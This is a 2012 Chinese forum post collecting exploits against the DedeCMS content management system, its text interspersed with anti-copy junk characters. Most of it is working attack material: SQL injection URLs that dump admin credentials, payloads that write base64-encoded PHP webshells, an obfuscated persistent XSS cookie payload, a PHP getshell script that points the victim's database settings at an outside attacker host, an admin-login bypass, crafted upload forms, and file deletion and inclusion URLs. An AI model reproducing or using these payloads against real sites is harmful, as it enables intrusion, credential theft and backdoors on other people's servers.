找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3085|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4 U' t, V! u) p+ ?& Y- H* ^
Dedecms 5.6 rss注入漏洞" ^" q: @& J4 c2 o. F3 j) K
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1# h# p' e6 K% q, ^1 M3 \
8 ]4 L+ y+ V; s: C- C! d# O* U

; _( C( w# [+ j7 o$ |
/ Y; c/ K9 Y& z  k3 _9 W6 J2 \( W7 p9 U6 _

0 d8 q  k3 x! r; y$ R5 M* u; X
* q! S: O! M& h
, p. ~; `% }0 S4 s5 p! u. m% [( `
, b" M5 F# ]( E# D( fDedeCms v5.6 嵌入恶意代码执行漏洞2 U' E" q/ V9 Z, w& h; n
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}3 B/ z4 D; p- C- C
发表后查看或修改即可执行
2 r+ V" |" b; U" Z2 G" Ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; G9 W9 w: L$ ?  |
生成x.php 密码xiao,直接生成一句话。" Z* z$ ?" e; M* X7 j" R

0 i# B! Y0 @8 N6 V) x+ l3 ^$ G3 _5 P8 ^& F+ t% D
# y: Q$ l3 K' E/ O9 |7 b
% D) Q. R$ a# R9 [2 z* S- `( N3 _

0 _$ o- V+ V2 H5 m% _$ \1 E9 @# ~( p) L# s9 X& }( i1 Z( r. q
4 h) i( P4 o# x1 K1 \2 U
' ?  ~5 {/ F6 f$ W4 A5 l* K
Dede 5.6 GBK SQL注入漏洞/ z7 c1 X" U" q: g" `5 |; l+ z- Q8 g
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';+ A, H- V2 f; H1 z/ F% x
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
6 E* }$ K) S+ E; q! K5 m4 R) `http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7) Y: @- e+ P8 c' z
  m( f" |) ?1 `/ s/ K5 L& f" [0 f
* E4 ?0 I* ~5 e% h) o- z9 T

. I, Y; K  f/ {& B1 s/ P; W
5 d& T, {+ i; M) h9 \) ]; n5 d
, p; P6 s/ [$ }8 @0 O, p& _% q: @5 {  x# {  U
# n) e4 s- s6 h7 U0 ~
% z5 B* K: k4 S$ Z" B' ?& A7 p# U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
& ^7 |3 ^  Y$ K
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ( e- e) d6 C1 p
0 _3 C0 G* [, v8 P
4 L. H  W2 Z0 q" n. k
5 \- S' U; ]5 f$ Y! }" }3 Z1 o

& O3 s/ L. l, S7 f% x* A% L. w* x
' `$ b5 l- D4 W, t
5 C2 S, p5 g8 A; o$ F) c" @/ ?DEDECMS 全版本 gotopage变量XSS漏洞$ {: R, N8 s& n4 R* r# ]5 O. i
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
6 S- t5 Y4 C' r6 z4 p
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="6 j# a4 H0 |# }# c, ], o
, s9 b9 _& [& o1 E6 w% L1 c

7 T& `! ]: c  i- `: E" L1 b2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 . k& @, }* K, H8 F& Z# Q
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
0 n- C* E6 V( D, A# [: ?* c, r$ I) w. a3 V

" M" @% Q: {& |4 W, }http://v57.demo.dedecms.com/dede/login.php
* o" ~( G! f+ V' ^! _5 V! J0 S5 b' a% o9 _4 Z* x% _4 E' Z

  h1 ^! }6 u6 l# o% b* m6 bcolor=Red]DeDeCMS(织梦)变量覆盖getshell+ k* b/ U. m2 u6 E* Y6 N
#!usr/bin/php -w6 P. T- g/ u3 n& {! k# q
<?php: ]' [# V0 X. [( K. R
error_reporting(E_ERROR);
4 m3 L9 j9 n3 ^- B) g2 f5 Z+ }" [/ h( Jset_time_limit(0);9 m! ~" l+ o3 |# @5 t5 d' Y! @& i
print_r(') C- I6 O2 ^$ K; b5 u& }6 N" g
DEDEcms Variable Coverage
4 O6 z8 n, z. [Exploit Author:
www.heixiaozi.comwww.webvul.com$ _- u6 {; D, |* l! v: K" T; o
);6 A2 J/ E+ p. [/ k: e" m0 ?
echo "\r\n";2 F( g. I% A/ \5 d- m
if($argv[2]==null){" ?8 ~: Q  q; E9 W  c* k& L4 W, s/ i
print_r('; n! x) c! ]' t3 u6 T- \
+---------------------------------------------------------------------------+
  m5 ^0 X) i: K8 S* `Usage: php '.$argv[0].' url aid path; [" M3 I( Q- X2 r: p# u; O0 u
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/+ N1 _2 u" o3 ]/ c
Example:& C/ C) y, D( y' S: s" {! A- D
php '.$argv[0].'
www.site.com 1 old
  {1 q  n, H+ {/ P0 ~+---------------------------------------------------------------------------+2 a- X8 L% _( P
');4 A. j6 j/ ]$ p9 v" j; m% Z8 R. a
exit;
( Z# `: N  r7 y- l( q9 D0 B& l2 K}
& q/ r& G! O) }6 F; p) F$url=$argv[1];
8 p2 m4 r  M5 c( \% j5 t$aid=$argv[2];3 d# i7 i) x; P% b. t" l4 z
$path=$argv[3];+ y6 y- |$ L6 F$ n/ n3 O
$exp=Getshell($url,$aid,$path);
+ E& }. R7 d% B) `( W: g4 Qif (strpos($exp,"OK")>12){& ^* I4 `4 @8 F* [/ j- r0 ~
echo "
$ v6 P0 p  A" kExploit Success \n";
  H. s7 T6 K% e" Jif($aid==1)echo "7 Y' X6 ]1 z) F, g7 H9 d& }* v' `
Shell:".$url."/$path/data/cache/fuck.php\n" ;0 f6 u) s: I2 n$ v

  L; w7 W& ^0 s1 [9 f# ?3 Z* s. x0 u" `  l
if($aid==2)echo "% A+ F3 R; h6 t0 ]! J" H+ A
Shell:".$url."/$path/fuck.php\n" ;
# R# H! M4 k7 ~1 S, @3 W
+ s$ \/ E2 f. w+ X* n/ t7 E9 n
if($aid==3)echo "
0 x: y9 g* b! C8 A" mShell:".$url."/$path/plus/fuck.php\n";
* j7 b4 f: }4 {: `* F( m' H$ p" q) d* L8 E
) M- E8 F! T1 r/ a+ g  d
}else{+ o; B. k6 Z& v( z
echo "* R/ o0 Z; J  [2 |' }$ i' Q: N1 o" P
Exploit Failed \n";
/ Q8 s; B3 r) F- ?% L! B}
; P) w$ {+ `$ q' Efunction Getshell($url,$aid,$path){
! J# _* P+ s- w" T) S$id=$aid;
: S) p! `1 n8 L; K5 R$host=$url;& A% @% {  g% `" ]( k
$port="80";
- V- A+ k) a2 P1 M$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% i* `: w/ ?. f
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";$ s! ]" e9 z  J1 W+ j/ o: ?
$data .= "Host: ".$host."\r\n";
3 h) q- z- Z! P3 T$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
! @# q: w  C% f& E$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";! B+ }  c7 x9 {& E
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
6 b. T( u3 ]* G# l7 z4 Z% a( i0 ^//$data .= "Accept-Encoding: gzip,deflate\r\n";+ ^# U0 ^0 y+ e" \* q* ~% [
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";' l5 y! ~) J* ~5 [. X0 C
$data .= "Connection: keep-alive\r\n";- b7 @2 f2 v) @2 f) T% N  u0 z
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
' R9 i# w. w3 w9 f$data .= "Content-Length: ".strlen($content)."\r\n\r\n";! F& R3 ]2 V+ z; @4 _1 F% z9 p4 `2 ]
$data .= $content."\r\n";! [( n8 t/ o% s
$ock=fsockopen($host,$port);
( y$ l6 x) G; L. j& Lif (!$ock) {" E7 Y; {" M9 R4 G" }/ D7 x& s, |( C
echo ": s9 m* q9 P2 M( V
No response from ".$host."\n";: z: ]+ z3 D$ F9 k* j& p. `
}
9 c) x( w$ y6 h9 v' X: J3 }fwrite($ock,$data);
" K$ s' d2 Q! @2 ~7 owhile (!feof($ock)) {/ Y1 G5 R3 ^, N( Y
$exp=fgets($ock, 1024);; S& L+ i4 @/ k/ M, f3 `
return $exp;% e) o- |* L% }
}
3 ~. b: q% [9 r$ `  \+ d- I7 `}' T& ^$ {- `' u# L4 t# z! g
, Q: g$ A$ ]# y0 f3 P) s" b" r9 {

4 p; ~; F; M1 T. a4 n$ l?>5 J5 J  S4 q( E; p" t5 @' A

% \0 t) g: o6 u2 r$ H8 k% D" S$ U$ _; |

* k' q/ p3 L" w' \* e; l
9 `! X: S: t& J' h) V! C1 H% @6 D! h# p5 C, C

; i; Z5 B; _1 }* f3 R; D/ g; i3 }% X5 P) w' C" Q; f
/ _) b' L2 q0 R. w/ Q/ R

. F- O5 u5 Z/ l5 o( h) _4 w* j  y5 B6 Z) g; F' m9 i/ W
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台). B- N' \" y4 s0 P6 `
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: ~' G! c% x: Z. W& {( q) T6 K

" y; c8 b: A& }$ f9 p# ?+ [
' q" W8 o# [- k3 ~把上面validate=dcug改为当前的验证码,即可直接进入网站后台# \) }8 c  h7 m: ?% y8 m
! i1 l5 ?8 B/ [) O
. I4 j$ F% A' ]5 o6 u) T) U
此漏洞的前提是必须得到后台路径才能实现
  |7 z( X8 G/ W$ T9 j5 h( n  k9 c. \) _5 d- s+ a6 V7 v
1 ]( H( O% t$ C8 K

- d" B' }( |; g& `- X; q2 _
/ |4 t- b0 v$ Y2 `3 F: Y5 a" Z0 ]; B. K6 {$ |& Q* H

( U. E/ ?' e9 G9 |2 M2 z, T
* K9 I$ [& i2 s" f( n, W+ \' L% U5 b
! {! X; W  T3 P( k0 W5 w% @* k* ]" w- ^

) U4 r& G# q: y) ]6 x' s$ A/ Y) o- D) ~Dedecms织梦 标签远程文件写入漏洞& B7 v2 ~% I; o& Y' {0 k
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
8 F- d8 R4 M! K/ b
, ^  a( ?; i: S/ I$ G( o1 a6 t8 ?& T( ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
3 S1 h8 h" z  U<form action="" method="post" name="QuickSearch" id="QuickSearch">) m6 D1 s4 f, E8 m3 m
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
) P5 w- b( P' G) }0 T<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />5 |/ S8 x/ E3 R. F* E# A
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! N/ Z4 o( V9 [3 Q- \
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />% E4 R# y# Y1 c9 }; |+ x1 O+ W
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" \+ d1 P! |0 y
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
# n/ O/ Z% h: |% |* r<input type="text" value="true" name="nocache" style="width:400">
% j9 U0 B* W; k; z9 k8 u# m<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 z2 E) R* y. `) N</form>3 w1 `$ b' O; r3 P4 K- J
<script>
+ o  M2 b4 ^9 K. u9 ^, j# Tfunction addaction()
$ d# e: Z8 u: @. V3 ?, }{
2 p; L+ C- ^) s! x0 gdocument.QuickSearch.action=document.QuickSearch.doaction.value;
: ?1 p/ L* r; \& g: ~}
/ h. ^2 B4 t0 t3 t. D</script>
4 B. J" \# f$ z8 o
) w8 U& T5 d0 @* O
5 T/ U+ |6 y2 j$ M; _( @, h/ h5 c/ X! v1 }7 z+ e2 G6 p

& T( J  m8 |6 ^4 B  @2 K. C
+ g2 f# @$ ]3 j& b1 o6 _
* j0 F3 @, N  K$ l$ D$ H/ ~
  I3 `! z- W6 ?  Y6 X
' s5 x* a2 @6 F! s+ Z. h- {- I8 H: P, A" k/ o( N

4 f$ V" Z1 M; z9 F- e: C. qDedeCms v5.6 嵌入恶意代码执行漏洞
2 y  p) J9 C- U% Q" z* u9 V- O注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行/ Y1 Q. m$ Z* B. ~
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
$ o& O3 V/ C* |) b9 |* Y生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
& G( P2 g+ g# m' q+ @* F* YDedecms <= V5.6 Final模板执行漏洞
0 K) ^2 ?: o! m5 l5 ^注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:' s+ J% D2 S7 a" ]
uploads/userup/2/12OMX04-15A.jpg
' b+ X% U% M7 }! O6 j$ \
1 z3 n9 w( H6 H3 D% `, U; a
% G" b8 V( h2 O/ H9 P9 B  [模板内容是(如果限制图片格式,加gif89a):2 M- d5 N, ^8 S2 N6 N
{dede:name runphp='yes'}$ B' H( B9 ^0 O# @3 k2 R# j9 v
$fp = @fopen("1.php", 'a');/ f. I: x9 Q+ e% A+ B' ?! K
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");5 u$ }; P9 u7 C3 T& a- M% g
@fclose($fp);
2 J; H/ l- [& v{/dede:name}; W/ o7 z# Y2 N+ l$ W! K
2 修改刚刚发表的文章,查看源文件,构造一个表单:
8 j0 H9 {$ m7 N, ?# ~<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
+ l' U- a. ^: ^<input type="hidden" name="dopost" value="save" />
+ G% \- t1 Y; k' Y6 T) M" X# p2 Y4 Y<input type="hidden" name="aid" value="2" />2 u) J- U  o7 Y+ w" I, d* f7 D# F
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
& H' a7 J0 `" W6 P/ c' i<input type="hidden" name="channelid" value="1" />
8 P. o! F- i1 ~8 N% Z4 z1 `6 Y# c, U<input type="hidden" name="oldlitpic" value="" />
( T1 J! B) X- C, P& F3 u/ a9 T<input type="hidden" name="sortrank" value="1275972263" />
& n6 {) c  |3 X! v9 `1 D- W2 ~4 o' Z$ H5 Q( f, S1 s# S

9 c7 a) W7 \- |) z3 W/ b<div id="mainCp">' O: v7 q, C& F* B8 W/ \: l
<h3 class="meTitle"><strong>修改文章</strong></h3>
% k+ N1 W8 |( O/ F: B6 z
  O5 u0 z$ i- F0 ~, B% I  a* O' b/ u- D9 I; z, ?- X
<div class="postForm">
8 n! R$ o* H2 [* s<label>标题:</label># q, E1 K3 T6 F0 K; ~
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>' J. E( _# Y) B& b' r9 D# W
: I1 v6 e( H/ m0 [

! V% o8 E, g0 \+ O+ J; z9 j1 x0 c<label>标签TAG:</label>
9 l& m& x( g$ j<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)# X, Z( h. c- w' H# e# s

+ k6 H6 a7 c! r; o
  t2 ^7 A0 ]% Y( C. f<label>作者:</label>
2 Z6 L4 ~, N+ E$ N1 t( ^1 x3 [" w: U<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>! ^6 ?6 I; O  i' D2 ~* p
* w* W; ?, g* N' p' E( v& x
4 ~2 k( k7 }5 Z" B4 Q$ f
<label>隶属栏目:</label>- M/ G. N* ]3 k- \6 ?! l; R
<select name='typeid' size='1'>
  ]& [! R  A) U4 t5 x<option value='1' class='option3' selected=''>测试栏目</option>
0 w# {: S/ M5 v</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)! Q( I/ L; K$ R  K; Y0 o1 }) h
6 q4 j6 q6 |2 p2 I3 l9 ]$ I/ I

! l. }5 l# {9 @2 W( J<label>我的分类:</label>, `' C9 k$ y9 c+ S( z- y
<select name='mtypesid' size='1'>
4 b9 n7 v$ r( t, z4 i/ N<option value='0' selected>请选择分类...</option>
5 t& K; \7 U; Z# u+ u2 w! R<option value='1' class='option3' selected>hahahha</option>
& X& `- ~3 G3 l( v6 }3 _</select>7 x8 u& {" n  h# F" `

- b& C+ T2 b! c" W9 c9 f/ ^5 g5 i4 x2 g8 Z6 [  Q
<label>信息摘要:</label>
' `& D7 I/ ?" V9 A0 `<textarea name="description" id="description">1111111</textarea>% f" @0 V; o1 @: k
(内容的简要说明)+ L$ w1 v" d5 T9 F5 c& L! x; E. W
. ~( a9 b# y1 L0 F" J& x4 A

- w9 t8 o5 t' A. a; D2 z<label>缩略图:</label>
6 ~3 B% h& I, B+ g! ^<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>: J  S  `3 B/ }1 @3 R

  U2 a& U6 h8 G# I% ]/ H
5 p7 `; ^" W& F/ F; Q6 w<input type='text' name='templet'
) @: x0 S0 T) I' U& y, Ivalue="../ uploads/userup/2/12OMX04-15A.jpg">
- {0 B- Z9 l# N1 J- w1 i<input type='text' name='dede_addonfields'- _. i; K2 b% A
value="templet,htmltext;">(这里构造)& n/ w+ m/ U# s# S. L- Z
</div>/ E( B) S" a# ~
- f/ L0 P8 p- m: ?
# x( Z% R) Y7 w+ H
<!-- 表单操作区域 -->* z& Z4 \) s- Y
<h3 class="meTitle">详细内容</h3>
) ^: u2 {* p2 i. G7 d% o0 w. v: @  C4 q( z- m! L* W8 }0 ?- i
8 a1 {2 E: P/ r( l6 w
<div class="contentShow postForm">+ i" x) f+ b0 [: A
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
+ J; Z; A; u- w/ Y( H
2 {, G$ a) {/ Z$ S. o7 x0 S) U% V' M0 y5 s8 ~* n
<label>验证码:</label>0 ~2 \; G# S- F  T
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
* a/ a  f3 b( q: l: n5 d) u, p; ^<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
5 h0 l- h/ i# v3 ^6 t2 e6 i- H
  I" S$ `6 a& n% ]3 I% o
; E7 N) P+ V/ h2 ~5 ?9 n4 O<button class="button2" type="submit">提交</button>
% ~5 L4 M2 _0 j$ [+ I$ f<button class="button2 ml10" type="reset">重置</button>( k' |: q4 P# Z4 \3 T
</div>1 K* V2 ?) \' O, F

; _- I' A. ~0 l" ?' F4 Z2 k/ Z  W) V5 P9 I  h0 e
</div>9 ]6 N; Z+ u5 t8 B$ M+ D; l
  w; U: l  Q9 I6 i& \5 f6 |3 h3 I

# q: A6 s  e; q) U</form>
* t* `% d* w9 N/ D: i2 C1 h0 d: i- R  z9 u4 m) ]
0 Z) b( r  p$ B4 T6 Q3 z6 D
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
. E% _" ]5 `& ?+ ?8 C假设刚刚修改的文章的aid为2,则我们只需要访问:' G' H: D* J4 b" y7 G; n5 G
http://127.0.0.1/dede/plus/view.php?aid=2
# k/ e) p( U) h8 Q/ h$ f即可以在plus目录下生成webshell:1.php7 K1 z  A  X" k2 W+ S

& o0 O! E3 J4 |  j+ u/ m: \" F# k  a  M. ^% C% h3 \; C
) ^, \& z* X8 S8 S
, R4 K$ c' E8 g  G
' R+ W1 f# ^) K

4 X* ^/ m  T! q0 P3 B
$ C! P6 s) P9 ^) Z' R8 ^1 Z, W4 d2 }& @) @/ o+ P

& f* T/ \7 m# r- s+ F7 }  {: o& z! z8 `# I- m# O) O' r! {

% p& N+ g9 ]3 B; W, _0 ?$ P2 R" S; i9 f' }& R. B1 ^: t* J
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& W5 P3 R" a3 H7 y4 l+ ?% v, uGif89a{dede:field name='toby57' runphp='yes'}
% _: l1 ^& J) Q& C: fphpinfo();+ _3 Z; k. ~, z8 l+ @
{/dede:field}
' ?0 e, P+ C; s/ N! f保存为1.gif. ~% X, O3 w- L8 I- w$ H9 ^
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
% {& G; g1 U8 w, ~8 k& p- l0 a6 T2 h0 p<input type="hidden" name="aid" value="7" /> 9 i* u' R- T. x; i& E) K
<input type="hidden" name="mediatype" value="1" /> 6 ?5 }, p5 z5 {$ j
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
9 D: G3 j! B: A) n( u4 T<input type="hidden" name="dopost" value="save" /> - l8 |: y5 b" @2 K
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 3 i! l% ?1 M8 A$ k  I! |& v. U' m
<input name="addonfile" type="file" id="addonfile"/>
1 l6 Z1 h- h" c8 C  s8 O' c2 s1 V<button class="button2" type="submit" >更改</button>
8 n" Q8 O0 X8 i- j' Q</form> / E& A; `4 q, V/ w

9 k9 n0 |1 s5 m
. a6 C, ^$ R" ]5 o; e4 E% [构造如上表单,上传后图片保存为/uploads/userup/3/1.gif* l6 h3 G/ R9 v, a7 \5 |
发表文章,然后构造修改表单如下:  D* U) \0 P- d# U8 L

3 _% w, W! d  Q. E- s) Z5 V5 [/ q, o# T2 m
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 9 v; i+ x1 @/ ]" s( {
<input type="hidden" name="dopost" value="save" />
- g, @$ N$ o3 C6 ~" s; ?, l# N<input type="hidden" name="aid" value="2" /> 3 B  x$ g- W( `  y
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />   g. m, l' C# s
<input type="hidden" name="channelid" value="1" />
/ k6 {% ]- I7 R<input type="hidden" name="oldlitpic" value="" />
6 G' V: l3 e3 L7 ?* t; h6 C1 l<input type="hidden" name="sortrank" value="1282049150" />
# c4 |, H) u- ]2 d) W& R; W<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - d2 i$ Y* Z, C! D
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 0 z4 p5 e9 S" k& ?
<select name='typeid' size='1'>   @2 q, I. p0 {8 |& p  b$ c* {
<option value='1' class='option3' selected=''>Test</option>
: @4 A3 B: u7 f/ b% O' e' }" u<select name='mtypesid' size='1'>
" _/ k6 X# c% \! w# R- [; i  w. W/ b<option value='0' selected>请选择分类...</option>
2 x& Q3 [1 C& ^6 l. |<option value='1' class='option3' selected>aa</option></select>
8 c5 N& ^, ?; K1 K( L<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 9 b1 v: [8 I- h
<input type='hidden' name='dede_addonfields' value="templet">
9 y$ A2 d" I; m7 {( P4 g$ U4 |<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> : ?2 E. Y* F% k5 U# U" J) F( K1 ~
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
% N" `: M6 ?* Z7 h<button class="button2" type="submit">提交</button>
; a4 G  M  c( S* X, ?# S( R</form>
& U5 U+ Y" s8 n) x; R6 F7 @
% e5 t# I: m# u, d! R# b8 h2 ?% |9 _5 h
' g7 {( K; |, {- _2 s- M, Z0 V
% X5 X9 u. z9 b7 T. S
: y% j: Q% D# r+ S

% _. I& j2 G6 ~* H0 n6 U
9 t3 R2 [9 ^2 \! r: h
( ~+ w: G2 u/ A1 m* ~! ]
; I; |9 ]' a& G6 m" S+ x# I% x3 I: Q1 }  q! W. J  F1 D( i
. G1 h' t( t) B

* \4 d6 ^" X+ P+ C: v织梦(Dedecms)V5.6 远程文件删除漏洞5 R0 e5 e4 n+ p# E
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
3 A6 X' V$ G$ J- i
( q* Q; t4 ]9 A0 n
) H5 M' u4 R+ Z0 d% s$ N( f% ^0 O. I& ^/ W
. j, ~1 j- b( h  C1 k

7 I+ d% W5 c1 |9 X) F  f* I3 A1 W( q1 N4 ?
( \7 E' @% I) q) o; n

- _- C$ r( u1 q" F7 D2 o2 s. N& Z' k% a0 V. b8 L

' W/ e( r( a4 h0 `2 \织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 1 S( K0 v6 C$ c3 A7 Z
http://www.test.com/plus/carbuya ... urn&code=../../
; u6 d2 {6 |8 r: m4 d0 @# ]* c( W
1 C9 v  v5 o* O& ?7 F
, Y% [1 P6 M2 ?8 h
- ^! s& B+ [0 S# k

6 [2 b' D( L0 G+ S8 ?" d6 J- m4 a0 G* m1 s# ^; u9 G3 v- {
& D/ U' R2 j- i1 M

( Q) t: v+ Y$ r" G6 U& r9 p7 }- ]" p  P( S

+ E) d0 k7 _) \DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 & q! f9 ~( d0 D8 x  ]
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( q8 e$ E" I. D密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
7 e& r4 m- u" N7 T* R0 d, l; t
( ~3 {& x; W$ F& U! b
' B" f8 L2 Y3 n/ b' h5 i% ]
- R: H  I7 a* A' e6 C0 g) E% d" S4 L

8 {( ^/ Q5 S8 d& ~# \
! e7 H1 n! Q* K9 U: L( l6 G' d1 s) K2 z* U8 A) I
2 }# ~+ {3 w: `8 S
: k6 v2 R. Q/ V

% V0 m: |2 C1 B6 k9 E. O6 S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞! U% q5 h- {& D; P# {# [4 R
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
